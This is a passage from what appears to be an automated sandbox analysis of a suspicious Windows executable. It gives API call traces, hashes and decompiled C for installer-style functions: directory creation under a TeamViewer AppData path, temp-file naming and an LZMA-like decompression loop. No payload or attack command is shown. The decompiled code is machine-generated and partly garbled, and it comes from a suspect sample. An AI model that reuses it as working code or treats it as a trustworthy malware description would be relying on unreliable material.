                                                                                                                        • WriteFile.KERNELBASE(0040B040,0040DEEC,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                                        • SetFilePointer.KERNELBASE(004E5277,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$CountTickWrite
                                                                                                                        • String ID: @0A$wRN
                                                                                                                        • API String ID: 2146148272-3750349230
                                                                                                                        • Opcode ID: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                                        • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                                        • Opcode Fuzzy Hash: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                                        • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                                                        				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                                                        				int _t19;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                                                        				signed char _t22;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                                                        				CHAR* _t25;
                                                                                                                        				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                                                        				void* _t30;
                                                                                                                        
                                                                                                                        				_t23 = __ebx;
                                                                                                                        				_t25 = E004029F6(0xfffffff0);
                                                                                                                        				_t10 = E004056ED(_t25);
                                                                                                                        				_t27 = _t10;
                                                                                                                        				if(_t10 != __ebx) {
                                                                                                                        					do {
                                                                                                                        						_t29 = E00405684(_t27, 0x5c);
                                                                                                                        						 *_t29 = _t23;
                                                                                                                        						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                                                        						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                                                        						if(_t19 == 0) {
                                                                                                                        							if(GetLastError() != 0xb7) {
                                                                                                                        								L4:
                                                                                                                        								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                                                        							} else {
                                                                                                                        								_t22 = GetFileAttributesA(_t25); // executed
                                                                                                                        								if((_t22 & 0x00000010) == 0) {
                                                                                                                        									goto L4;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                                                        						 *_t29 = _t20;
                                                                                                                        						_t27 =  &(_t29[0]);
                                                                                                                        					} while (_t20 != _t23);
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                                                        					_push(0xfffffff5);
                                                                                                                        					E00401423();
                                                                                                                        				} else {
                                                                                                                        					E00401423(0xffffffe6);
                                                                                                                        					E00405B66("C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer", _t25);
                                                                                                                        					SetCurrentDirectoryA(_t25); // executed
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 004056FB
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\TeamViewer,00000000,00000000,000000F0), ref: 00401622
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401617
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 3751793516-4213038595
                                                                                                                        • Opcode ID: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                                        • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                                        • Opcode Fuzzy Hash: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                                        • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                        				signed int _t11;
                                                                                                                        				int _t14;
                                                                                                                        				signed int _t16;
                                                                                                                        				void* _t19;
                                                                                                                        				CHAR* _t20;
                                                                                                                        
                                                                                                                        				_t20 = _a4;
                                                                                                                        				_t19 = 0x64;
                                                                                                                        				while(1) {
                                                                                                                        					_t19 = _t19 - 1;
                                                                                                                        					_a4 = 0x61736e;
                                                                                                                        					_t11 = GetTickCount();
                                                                                                                        					_t16 = 0x1a;
                                                                                                                        					_a6 = _a6 + _t11 % _t16;
                                                                                                                        					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                                                        					if(_t14 != 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					if(_t19 != 0) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					 *_t20 =  *_t20 & 0x00000000;
                                                                                                                        					return _t14;
                                                                                                                        				}
                                                                                                                        				return _t20;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-319305030
                                                                                                                        • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                        • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                                        • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                        • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00403208(void* __eflags) {
                                                                                                                        				void* _t2;
                                                                                                                        				void* _t5;
                                                                                                                        				CHAR* _t6;
                                                                                                                        
                                                                                                                        				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                                                        				E00405DC8(_t6);
                                                                                                                        				_t2 = E004056C6(_t6);
                                                                                                                        				if(_t2 != 0) {
                                                                                                                        					E00405659(_t2, _t6);
                                                                                                                        					CreateDirectoryA(_t6, 0); // executed
                                                                                                                        					_t5 = E0040586C("1033", _t6); // executed
                                                                                                                        					return _t5;
                                                                                                                        				} else {
                                                                                                                        					return _t2;
                                                                                                                        				}
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 4115351271-3512041753
                                                                                                                        • Opcode ID: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                                        • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                                        • Opcode Fuzzy Hash: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                                        • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 99%
                                                                                                                        			E00406566() {
                                                                                                                        				signed int _t530;
                                                                                                                        				void _t537;
                                                                                                                        				signed int _t538;
                                                                                                                        				signed int _t539;
                                                                                                                        				unsigned short _t569;
                                                                                                                        				signed int _t579;
                                                                                                                        				signed int _t607;
                                                                                                                        				void* _t627;
                                                                                                                        				signed int _t628;
                                                                                                                        				signed int _t635;
                                                                                                                        				signed int* _t643;
                                                                                                                        				void* _t644;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					_t530 =  *(_t644 - 0x30);
                                                                                                                        					if(_t530 >= 4) {
                                                                                                                        					}
                                                                                                                        					 *(_t644 - 0x40) = 6;
                                                                                                                        					 *(_t644 - 0x7c) = 0x19;
                                                                                                                        					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                        					while(1) {
                                                                                                                        						L145:
                                                                                                                        						 *(_t644 - 0x50) = 1;
                                                                                                                        						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                        						while(1) {
                                                                                                                        							L149:
                                                                                                                        							if( *(_t644 - 0x48) <= 0) {
                                                                                                                        								goto L155;
                                                                                                                        							}
                                                                                                                        							L150:
                                                                                                                        							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                        							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                        							 *(_t644 - 0x54) = _t643;
                                                                                                                        							_t569 =  *_t643;
                                                                                                                        							_t635 = _t569 & 0x0000ffff;
                                                                                                                        							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                        							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                        								_t628 = _t627 + 1;
                                                                                                                        								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                        								 *(_t644 - 0x50) = _t628;
                                                                                                                        							} else {
                                                                                                                        								 *(_t644 - 0x10) = _t607;
                                                                                                                        								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                        								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                        							}
                                                                                                                        							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                        								L148:
                                                                                                                        								_t487 = _t644 - 0x48;
                                                                                                                        								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                        								L149:
                                                                                                                        								if( *(_t644 - 0x48) <= 0) {
                                                                                                                        									goto L155;
                                                                                                                        								}
                                                                                                                        								goto L150;
                                                                                                                        							} else {
                                                                                                                        								L154:
                                                                                                                        								L146:
                                                                                                                        								if( *(_t644 - 0x6c) == 0) {
                                                                                                                        									L169:
                                                                                                                        									 *(_t644 - 0x88) = 0x18;
                                                                                                                        									L170:
                                                                                                                        									_t579 = 0x22;
                                                                                                                        									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                        									_t539 = 0;
                                                                                                                        									L172:
                                                                                                                        									return _t539;
                                                                                                                        								}
                                                                                                                        								L147:
                                                                                                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                        								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                        								_t484 = _t644 - 0x70;
                                                                                                                        								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                        								goto L148;
                                                                                                                        							}
                                                                                                                        							L155:
                                                                                                                        							_t537 =  *(_t644 - 0x7c);
                                                                                                                        							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                        							while(1) {
                                                                                                                        								L140:
                                                                                                                        								 *(_t644 - 0x88) = _t537;
                                                                                                                        								while(1) {
                                                                                                                        									L1:
                                                                                                                        									_t538 =  *(_t644 - 0x88);
                                                                                                                        									if(_t538 > 0x1c) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									L2:
                                                                                                                        									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
                                                                                                                        										case 0:
                                                                                                                        											L3:
                                                                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L4:
                                                                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                        											_t538 =  *( *(_t644 - 0x70));
                                                                                                                        											if(_t538 > 0xe1) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											L5:
                                                                                                                        											_t542 = _t538 & 0x000000ff;
                                                                                                                        											_push(0x2d);
                                                                                                                        											asm("cdq");
                                                                                                                        											_pop(_t581);
                                                                                                                        											_push(9);
                                                                                                                        											_pop(_t582);
                                                                                                                        											_t638 = _t542 / _t581;
                                                                                                                        											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                        											asm("cdq");
                                                                                                                        											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                        											 *(_t644 - 0x3c) = _t633;
                                                                                                                        											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                        											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                        											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                        											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                        												L10:
                                                                                                                        												if(_t641 == 0) {
                                                                                                                        													L12:
                                                                                                                        													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                        													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                        													goto L15;
                                                                                                                        												} else {
                                                                                                                        													goto L11;
                                                                                                                        												}
                                                                                                                        												do {
                                                                                                                        													L11:
                                                                                                                        													_t641 = _t641 - 1;
                                                                                                                        													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                        												} while (_t641 != 0);
                                                                                                                        												goto L12;
                                                                                                                        											}
                                                                                                                        											L6:
                                                                                                                        											if( *(_t644 - 4) != 0) {
                                                                                                                        												GlobalFree( *(_t644 - 4));
                                                                                                                        											}
                                                                                                                        											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        											 *(_t644 - 4) = _t538;
                                                                                                                        											if(_t538 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                        												goto L10;
                                                                                                                        											}
                                                                                                                        										case 1:
                                                                                                                        											L13:
                                                                                                                        											__eflags =  *(_t644 - 0x6c);
                                                                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                                                                        												L157:
                                                                                                                        												 *(_t644 - 0x88) = 1;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L14:
                                                                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                        											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                        											_t45 = _t644 - 0x48;
                                                                                                                        											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                        											__eflags =  *_t45;
                                                                                                                        											L15:
                                                                                                                        											if( *(_t644 - 0x48) < 4) {
                                                                                                                        												goto L13;
                                                                                                                        											}
                                                                                                                        											L16:
                                                                                                                        											_t550 =  *(_t644 - 0x40);
                                                                                                                        											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                        												L20:
                                                                                                                        												 *(_t644 - 0x48) = 5;
                                                                                                                        												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                        												goto L23;
                                                                                                                        											}
                                                                                                                        											L17:
                                                                                                                        											 *(_t644 - 0x74) = _t550;
                                                                                                                        											if( *(_t644 - 8) != 0) {
                                                                                                                        												GlobalFree( *(_t644 - 8));
                                                                                                                        											}
                                                                                                                        											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                        											 *(_t644 - 8) = _t538;
                                                                                                                        											if(_t538 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												goto L20;
                                                                                                                        											}
                                                                                                                        										case 2:
                                                                                                                        											L24:
                                                                                                                        											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                        											 *(_t644 - 0x84) = 6;
                                                                                                                        											 *(_t644 - 0x4c) = _t557;
                                                                                                                        											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                        											goto L132;
                                                                                                                        										case 3:
                                                                                                                        											L21:
                                                                                                                        											__eflags =  *(_t644 - 0x6c);
                                                                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                                                                        												L158:
                                                                                                                        												 *(_t644 - 0x88) = 3;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L22:
                                                                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                        											_t67 = _t644 - 0x70;
                                                                                                                        											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                        											__eflags =  *_t67;
                                                                                                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                        											L23:
                                                                                                                        											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                        											if( *(_t644 - 0x48) != 0) {
                                                                                                                        												goto L21;
                                                                                                                        											}
                                                                                                                        											goto L24;
                                                                                                                        										case 4:
                                                                                                                        											L133:
                                                                                                                        											_t559 =  *_t642;
                                                                                                                        											_t626 = _t559 & 0x0000ffff;
                                                                                                                        											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                        											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                        												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                        												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                        												 *(_t644 - 0x40) = 1;
                                                                                                                        												_t560 = _t559 - (_t559 >> 5);
                                                                                                                        												__eflags = _t560;
                                                                                                                        												 *_t642 = _t560;
                                                                                                                        											} else {
                                                                                                                        												 *(_t644 - 0x10) = _t596;
                                                                                                                        												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                        												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                        											}
                                                                                                                        											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                        												goto L139;
                                                                                                                        											} else {
                                                                                                                        												goto L137;
                                                                                                                        											}
                                                                                                                        										case 5:
                                                                                                                        											L137:
                                                                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                                                                        												L168:
                                                                                                                        												 *(_t644 - 0x88) = 5;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L138:
                                                                                                                        											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                        											L139:
                                                                                                                        											_t537 =  *(_t644 - 0x84);
                                                                                                                        											L140:
                                                                                                                        											 *(_t644 - 0x88) = _t537;
                                                                                                                        											goto L1;
                                                                                                                        										case 6:
                                                                                                                        											L25:
                                                                                                                        											__edx = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												L36:
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) = 1;
                                                                                                                        												 *(__ebp - 0x84) = 7;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        												goto L132;
                                                                                                                        											}
                                                                                                                        											L26:
                                                                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        											__esi =  *(__ebp - 0x60);
                                                                                                                        											__cl = 8;
                                                                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        													_t98 = __ebp - 0x38;
                                                                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        													__eflags =  *_t98;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x38) = 0;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                                                                        												L35:
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												goto L61;
                                                                                                                        											} else {
                                                                                                                        												L32:
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 8);
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        										case 7:
                                                                                                                        											L66:
                                                                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                                                                        												L68:
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        												 *(__ebp - 0x80) = 0x16;
